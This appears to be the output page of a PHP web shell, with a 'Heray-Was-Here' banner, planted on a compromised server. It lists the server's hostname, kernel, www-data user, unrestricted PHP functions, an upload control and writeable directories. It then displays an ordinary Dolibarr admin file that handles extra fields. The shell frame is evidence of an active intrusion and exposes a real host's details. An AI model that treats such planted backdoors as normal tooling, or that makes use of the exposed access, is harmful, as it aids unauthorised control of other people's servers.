Heray-Was-Here
Server : Apache
System : Linux mail.lomejor.cr 6.8.0-1059-azure #65~22.04.1-Ubuntu SMP Thu May 28 16:59:19 UTC 2026 x86_64
User : www-data ( 33)
PHP Version : 8.2.31
Disable Function : NONE
Directory :  /var/www/dev/htdocs/core/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/dev/htdocs/core/actions_extrafields.inc.php
<?php
/* Copyright (C) 2011-2020 Laurent Destailleur  <eldy@users.sourceforge.net>
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 3 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program. If not, see <https://www.gnu.org/licenses/>.
 * or see https://www.gnu.org/
 *
 * $elementype must be defined.
 */

/**
 *	\file			htdocs/core/actions_extrafields.inc.php
 *  \brief			Code for actions on extrafields admin pages
 */

$maxsizestring = 255;
$maxsizeint = 10;
$mesg = array();

$extrasize = GETPOST('size', 'intcomma');
$type = GETPOST('type', 'alphanohtml');
$param = GETPOST('param', 'alphanohtml');
$css = GETPOST('css', 'alphanohtml');
$cssview = GETPOST('cssview', 'alphanohtml');
$csslist = GETPOST('csslist', 'alphanohtml');

if ($type == 'double' && strpos($extrasize, ',') === false) {
	$extrasize = '24,8';
}
if ($type == 'date') {
	$extrasize = '';
}
if ($type == 'datetime') {
	$extrasize = '';
}
if ($type == 'select') {
	$extrasize = '';
}


// Add attribute
if ($action == 'add') {
	if (GETPOST("button") != $langs->trans("Cancel")) {
		// Check values
		if (!$type) {
			$error++;
			$langs->load("errors");
			$mesg[] = $langs->trans("ErrorFieldRequired", $langs->transnoentitiesnoconv("Type"));
			$action = 'create';
		}
		if ($type == 'varchar' && $extrasize <= 0) {
			$error++;
			$langs->load("errors");
			$mesg[] = $langs->trans("ErrorFieldRequired", $langs->transnoentitiesnoconv("Size"));
			$action = 'edit';
		}
		if ($type == 'varchar' && $extrasize > $maxsizestring) {
			$error++;
			$langs->load("errors");
			$mesg[] = $langs->trans("ErrorSizeTooLongForVarcharType", $maxsizestring);
			$action = 'create';
		}
		if ($type == 'int' && $extrasize > $maxsizeint) {
			$error++;
			$langs->load("errors");
			$mesg[] = $langs->trans("ErrorSizeTooLongForIntType", $maxsizeint);
			$action = 'create';
		}
		if ($type == 'select' && !$param) {
			$error++;
			$langs->load("errors");
			$mesg[] = $langs->trans("ErrorNoValueForSelectType");
			$action = 'create';
		}
		if ($type == 'sellist' && !$param) {
			$error++;
			$langs->load("errors");
			$mesg[] = $langs->trans("ErrorNoValueForSelectListType");
			$action = 'create';
		}
		if ($type == 'checkbox' && !$param) {
			$error++;
			$langs->load("errors");
			$mesg[] = $langs->trans("ErrorNoValueForCheckBoxType");
			$action = 'create';
		}
		if ($type == 'link' && !$param) {
			$error++;
			$langs->load("errors");
			$mesg[] = $langs->trans("ErrorNoValueForLinkType");
			$action = 'create';
		}
		if ($type == 'radio' && !$param) {
			$error++;
			$langs->load("errors");
			$mesg[] = $langs->trans("ErrorNoValueForRadioType");
			$action = 'create';
		}
		if ((($type == 'radio') || ($type == 'checkbox')) && $param) {
			// Construct array for parameter (value of select list)
			$parameters = $param;
			$parameters_array = explode("\r\n", $parameters);
			foreach ($parameters_array as $param_ligne) {
				if (!empty($param_ligne)) {
					if (preg_match_all('/,/', $param_ligne, $matches)) {
						if (count($matches[0]) > 1) {
							$error++;
							$langs->load("errors");
							$mesg[] = $langs->trans("ErrorBadFormatValueList", $param_ligne);
							$action = 'create';
						}
					} else {
						$error++;
						$langs->load("errors");
						$mesg[] = $langs->trans("ErrorBadFormatValueList", $param_ligne);
						$action = 'create';
					}
				}
			}
		}

		if (!$error) {
			if (strlen(GETPOST('attrname', 'aZ09')) < 3) {
				$error++;
				$langs->load("errors");
				$mesg[] = $langs->trans("ErrorValueLength", $langs->transnoentitiesnoconv("AttributeCode"), 3);
				$action = 'create';
			}
		}

		// Check reserved keyword with more than 3 characters
		if (!$error) {
			if (in_array(GETPOST('attrname', 'aZ09'), array('and', 'keyword', 'table', 'index', 'int', 'integer', 'float', 'double', 'real', 'position'))) {
				$error++;
				$langs->load("errors");
				$mesg[] = $langs->trans("ErrorReservedKeyword", GETPOST('attrname', 'aZ09'));
				$action = 'create';
			}
		}

		if (!$error) {
			// attrname must be alphabetical and lower case only
			if (GETPOSTISSET("attrname") && preg_match("/^[a-z0-9_]+$/", GETPOST('attrname', 'aZ09')) && !is_numeric(GETPOST('attrname', 'aZ09'))) {
				// Construct array for parameter (value of select list)
				$default_value = GETPOST('default_value', 'alpha');
				$parameters = $param;
				$parameters_array = explode("\r\n", $parameters);
				$params = array();
				//In sellist we have only one line and it can have come to do SQL expression
				if ($type == 'sellist' || $type == 'chkbxlst') {
					foreach ($parameters_array as $param_ligne) {
						$params['options'] = array($parameters=>null);
					}
				} else {
					// Else it's separated key/value and coma list
					foreach ($parameters_array as $param_ligne) {
						list($key, $value) = explode(',', $param_ligne);
						if (!array_key_exists('options', $params)) {
							$params['options'] = array();
						}
						$params['options'][$key] = $value;
					}
				}

				// Visibility: -1=not visible by default in list, 1=visible, 0=hidden
				$visibility = GETPOST('list', 'alpha');
				if ($type == 'separate') {
					$visibility = 3;
				}

				$result = $extrafields->addExtraField(
					GETPOST('attrname', 'aZ09'),
					GETPOST('label', 'alpha'),
					$type,
					GETPOST('pos', 'int'),
					$extrasize,
					$elementtype,
					(GETPOST('unique', 'alpha') ? 1 : 0),
					(GETPOST('required', 'alpha') ? 1 : 0),
					$default_value,
					$params,
					(GETPOST('alwayseditable', 'alpha') ? 1 : 0),
					(GETPOST('perms', 'alpha') ? GETPOST('perms', 'alpha') : ''),
					$visibility,
					GETPOST('help', 'alpha'),
					GETPOST('computed_value', 'alpha'),
					(GETPOST('entitycurrentorall', 'alpha') ? 0 : ''),
					GETPOST('langfile', 'alpha'),
					1,
					(GETPOST('totalizable', 'alpha') ? 1 : 0),
					GETPOST('printable', 'alpha'),
					array('css' => $css, 'cssview' => $cssview, 'csslist' => $csslist)
				);
				if ($result > 0) {
					setEventMessages($langs->trans('SetupSaved'), null, 'mesgs');
					header("Location: ".$_SERVER["PHP_SELF"]);
					exit;
				} else {
					$error++;
					$mesg = $extrafields->error;
					setEventMessages($mesg, null, 'errors');
				}
			} else {
				$error++;
				$langs->load("errors");
				$mesg = $langs->trans("ErrorFieldCanNotContainSpecialNorUpperCharacters", $langs->transnoentities("AttributeCode"));
				setEventMessages($mesg, null, 'errors');
				$action = 'create';
			}
		} else {
			setEventMessages($mesg, null, 'errors');
		}
	}
}

// Rename field
if ($action == 'update') {
	if (GETPOST("button") != $langs->trans("Cancel")) {
		// Check values
		if (!$type) {
			$error++;
			$langs->load("errors");
			$mesg[] = $langs->trans("ErrorFieldRequired", $langs->transnoentitiesnoconv("Type"));
			$action = 'edit';
		}
		if ($type == 'varchar' && $extrasize <= 0) {
			$error++;
			$langs->load("errors");
			$mesg[] = $langs->trans("ErrorFieldRequired", $langs->transnoentitiesnoconv("Size"));
			$action = 'edit';
		}
		if ($type == 'varchar' && $extrasize > $maxsizestring) {
			$error++;
			$langs->load("errors");
			$mesg[] = $langs->trans("ErrorSizeTooLongForVarcharType", $maxsizestring);
			$action = 'edit';
		}
		if ($type == 'int' && $extrasize > $maxsizeint) {
			$error++;
			$langs->load("errors");
			$mesg[] = $langs->trans("ErrorSizeTooLongForIntType", $maxsizeint);
			$action = 'edit';
		}
		if ($type == 'select' && !$param) {
			$error++;
			$langs->load("errors");
			$mesg[] = $langs->trans("ErrorNoValueForSelectType");
			$action = 'edit';
		}
		if ($type == 'sellist' && !$param) {
			$error++;
			$langs->load("errors");
			$mesg[] = $langs->trans("ErrorNoValueForSelectListType");
			$action = 'edit';
		}
		if ($type == 'checkbox' && !$param) {
			$error++;
			$langs->load("errors");
			$mesg[] = $langs->trans("ErrorNoValueForCheckBoxType");
			$action = 'edit';
		}
		if ($type == 'radio' && !$param) {
			$error++;
			$langs->load("errors");
			$mesg[] = $langs->trans("ErrorNoValueForRadioType");
			$action = 'edit';
		}
		if ((($type == 'radio') || ($type == 'checkbox')) && $param) {
			// Construct array for parameter (value of select list)
			$parameters = $param;
			$parameters_array = explode("\r\n", $parameters);
			foreach ($parameters_array as $param_ligne) {
				if (!empty($param_ligne)) {
					if (preg_match_all('/,/', $param_ligne, $matches)) {
						if (count($matches[0]) > 1) {
							$error++;
							$langs->load("errors");
							$mesg[] = $langs->trans("ErrorBadFormatValueList", $param_ligne);
							$action = 'edit';
						}
					} else {
						$error++;
						$langs->load("errors");
						$mesg[] = $langs->trans("ErrorBadFormatValueList", $param_ligne);
						$action = 'edit';
					}
				}
			}
		}

		if (!$error) {
			if (strlen(GETPOST('attrname', 'aZ09')) < 3 && empty($conf->global->MAIN_DISABLE_EXTRAFIELDS_CHECK_FOR_UPDATE)) {
				$error++;
				$langs->load("errors");
				$mesg[] = $langs->trans("ErrorValueLength", $langs->transnoentitiesnoconv("AttributeCode"), 3);
				$action = 'edit';
			}
		}

		// Check reserved keyword with more than 3 characters
		if (!$error) {
			if (in_array(GETPOST('attrname', 'aZ09'), array('and', 'keyword', 'table', 'index', 'integer', 'float', 'double', 'position')) && empty($conf->global->MAIN_DISABLE_EXTRAFIELDS_CHECK_FOR_UPDATE)) {
				$error++;
				$langs->load("errors");
				$mesg[] = $langs->trans("ErrorReservedKeyword", GETPOST('attrname', 'aZ09'));
				$action = 'edit';
			}
		}

		if (!$error) {
			if (GETPOSTISSET("attrname") && preg_match("/^\w[a-zA-Z0-9-_]*$/", GETPOST('attrname', 'aZ09')) && !is_numeric(GETPOST('attrname', 'aZ09'))) {
				$pos = GETPOST('pos', 'int');
				// Construct array for parameter (value of select list)
				$parameters = $param;
				$parameters_array = explode("\r\n", $parameters);
				$params = array();
				//In sellist we have only one line and it can have come to do SQL expression
				if ($type == 'sellist' || $type == 'chkbxlst') {
					foreach ($parameters_array as $param_ligne) {
						$params['options'] = array($parameters=>null);
					}
				} else {
					//Esle it's separated key/value and coma list
					foreach ($parameters_array as $param_ligne) {
						list($key, $value) = explode(',', $param_ligne);
						if (!array_key_exists('options', $params)) {
							$params['options'] = array();
						}
						$params['options'][$key] = $value;
					}
				}

				// Visibility: -1=not visible by default in list, 1=visible, 0=hidden
				$visibility = GETPOST('list', 'alpha');
				if ($type == 'separate') {
					$visibility = 3;
				}

				// Example: is_object($object) ? ($object->id < 10 ? round($object->id / 2, 2) : (2 * $user->id) * (int) substr($mysoc->zip, 1, 2)) : 'objnotdefined'
				$computedvalue = GETPOST('computed_value', 'nohtml');

				$result = $extrafields->update(
					GETPOST('attrname', 'aZ09'),
					GETPOST('label', 'alpha'),
					$type,
					$extrasize,
					$elementtype,
					(GETPOST('unique', 'alpha') ? 1 : 0),
					(GETPOST('required', 'alpha') ? 1 : 0),
					$pos,
					$params,
					(GETPOST('alwayseditable', 'alpha') ? 1 : 0),
					(GETPOST('perms', 'alpha') ?GETPOST('perms', 'alpha') : ''),
					$visibility,
					GETPOST('help', 'alpha'),
					GETPOST('default_value', 'alpha'),
					$computedvalue,
					(GETPOST('entitycurrentorall', 'alpha') ? 0 : ''),
					GETPOST('langfile'),
					GETPOST('enabled', 'alpha'),
					(GETPOST('totalizable', 'alpha') ? 1 : 0),
					GETPOST('printable', 'alpha'),
					array('css' => $css, 'cssview' => $cssview, 'csslist' => $csslist)
				);
				if ($result > 0) {
					setEventMessages($langs->trans('SetupSaved'), null, 'mesgs');
					header("Location: ".$_SERVER["PHP_SELF"]);
					exit;
				} else {
					$error++;
					$mesg = $extrafields->error;
					setEventMessages($mesg, null, 'errors');
				}
			} else {
				$error++;
				$langs->load("errors");
				$mesg = $langs->trans("ErrorFieldCanNotContainSpecialCharacters", $langs->transnoentities("AttributeCode"));
				setEventMessages($mesg, null, 'errors');
			}
		} else {
			setEventMessages($mesg, null, 'errors');
		}
	}
}

// Delete attribute
if ($action == 'delete') {
	if (GETPOSTISSET("attrname") && preg_match("/^\w[a-zA-Z0-9-_]*$/", GETPOST("attrname", 'aZ09'))) {
		$result = $extrafields->delete(GETPOST("attrname", 'aZ09'), $elementtype);
		if ($result >= 0) {
			header("Location: ".$_SERVER["PHP_SELF"]);
			exit;
		} else {
			$mesg = $extrafields->error;
		}
	} else {
		$error++;
		$langs->load("errors");
		$mesg = $langs->trans("ErrorFieldCanNotContainSpecialCharacters", $langs->transnoentities("AttributeCode"));
	}
}

Hry